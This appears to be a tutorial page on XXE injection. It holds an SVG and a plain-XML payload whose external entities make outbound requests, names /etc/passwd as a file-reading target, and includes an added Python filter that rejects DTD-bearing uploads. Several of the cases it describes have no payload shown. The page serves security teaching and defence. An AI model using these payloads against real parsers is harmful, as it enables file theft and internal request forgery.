XXE - XEE - XML External Entity

How to exploit XML External Entities (XXE). When a parser resolves external entities declared in the DTD of attacker-supplied XML, a remote attacker can read files off the filesystem, make HTTP requests to internal services/applications, and read the responses.

XXE with SVG

Because SVG is XML, it can also have XXEs:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
  "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd" [
  <!-- an internal subset can be embedded here -->
  <!ENTITY xxe SYSTEM "https://example.com/foo.txt">
]>
<svg width="100%" height="100%" viewBox="0 0 100 100"
     xmlns="http://www.w3.org/2000/svg">
  <text x="20" y="35">My &xxe;</text>
</svg>

The same idea with a minimal non-SVG document, whose entity resolves to a remote URL so that the parser makes an outbound request when it expands &sp;:

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://server/pixel?callback_token=ee34a1791ab345f789">
]>
<r>&sp;</r>
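From the defender's side, the SVG case above is usually an upload endpoint, and the real fix is to configure the XML parser so it never resolves DTDs or external entities. As an added example (not code from the original page), the following Python pre-parse gate rejects any uploaded SVG that carries a DOCTYPE before it reaches a parser, and classifies why. The functions classify_xml and safe_parse_svg are hypothetical names chosen here; the three sample documents are constructed inline (the first is the SVG payload shown above), and the gate is meant as defence in depth alongside parser hardening, not as a replacement for it.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample: the SVG payload from this page (external entity in the internal subset).
SVG_WITH_XXE = b"""<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
  "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd" [
  <!ENTITY xxe SYSTEM "https://example.com/foo.txt">
]>
<svg width="100%" height="100%" viewBox="0 0 100 100"
     xmlns="http://www.w3.org/2000/svg">
  <text x="20" y="35">My &xxe;</text>
</svg>
"""

# Constructed sample: a DTD that only declares an internal entity (no fetch, but still a DTD).
SVG_WITH_INTERNAL_DTD = b"""<?xml version="1.0"?>
<!DOCTYPE svg [ <!ENTITY brand "Example"> ]>
<svg xmlns="http://www.w3.org/2000/svg"><text>&brand;</text></svg>
"""

# Constructed sample: a benign SVG with no DTD at all.
SVG_CLEAN = b"""<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
  <circle cx="5" cy="5" r="4"/>
</svg>
"""

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
# Matches <!ENTITY name SYSTEM "..."> and <!ENTITY % name PUBLIC "..." "...">
EXTERNAL_ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?:%\s*)?[^\s>]+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE
)


def _to_text(data: bytes) -> str:
    """Decode just enough to see the markup keywords.

    UTF-16 input would hide the ASCII keywords from a byte regex, so a
    UTF-16 BOM is honoured; otherwise latin-1 is used because it never
    fails and keeps every ASCII byte (the DTD keywords) intact.
    """
    if data[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return data.decode("utf-16")
    return data.decode("latin-1")


def classify_xml(data: bytes) -> str:
    """Return 'external-entity', 'doctype' or 'ok' for an untrusted XML/SVG blob."""
    text = _to_text(data)
    if EXTERNAL_ENTITY_RE.search(text):
        return "external-entity"
    if DOCTYPE_RE.search(text):
        return "doctype"
    return "ok"


def safe_parse_svg(data: bytes) -> ET.Element:
    """Parse an uploaded SVG only if it carries no DTD at all.

    Rejecting every DOCTYPE (not only external entities) is the simplest
    policy: legitimate SVG uploads do not need one, and it also blocks
    entity-expansion (billion laughs) documents.
    """
    verdict = classify_xml(data)
    if verdict != "ok":
        raise ValueError(f"rejected SVG upload: {verdict}")
    return ET.fromstring(data)


if __name__ == "__main__":
    samples = (("xxe", SVG_WITH_XXE), ("internal", SVG_WITH_INTERNAL_DTD), ("clean", SVG_CLEAN))
    for name, blob in samples:
        print(name, classify_xml(blob))
    print(safe_parse_svg(SVG_CLEAN).tag)
```

The classification is useful for logging: an upload rejected as "external-entity" is worth an alert, whereas a stray internal DTD is more often a tooling artefact. Whatever the gate says, the parser that finally handles the document must still have DTD loading and external entity resolution switched off, because a text-level check cannot see entities pulled in through an external DTD referenced by PUBLIC or SYSTEM identifiers in the DOCTYPE itself.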

Read file

Let's try to read /etc/passwd in different ways. On Windows you could try to read C:\windows\system32\drivers\etc\hosts instead.

In this first case, notice that SYSTEM "file:///etc/passwd" will also work.

This second case should be useful for extracting a file if the web server is using PHP (not the case for PortSwigger's labs).

In this third case, notice that we are declaring the element stockCheck as ANY.

Directory listing

In Java-based applications it might be possible to list the contents of a directory via XXE with a payload that asks for the directory instead of a file:
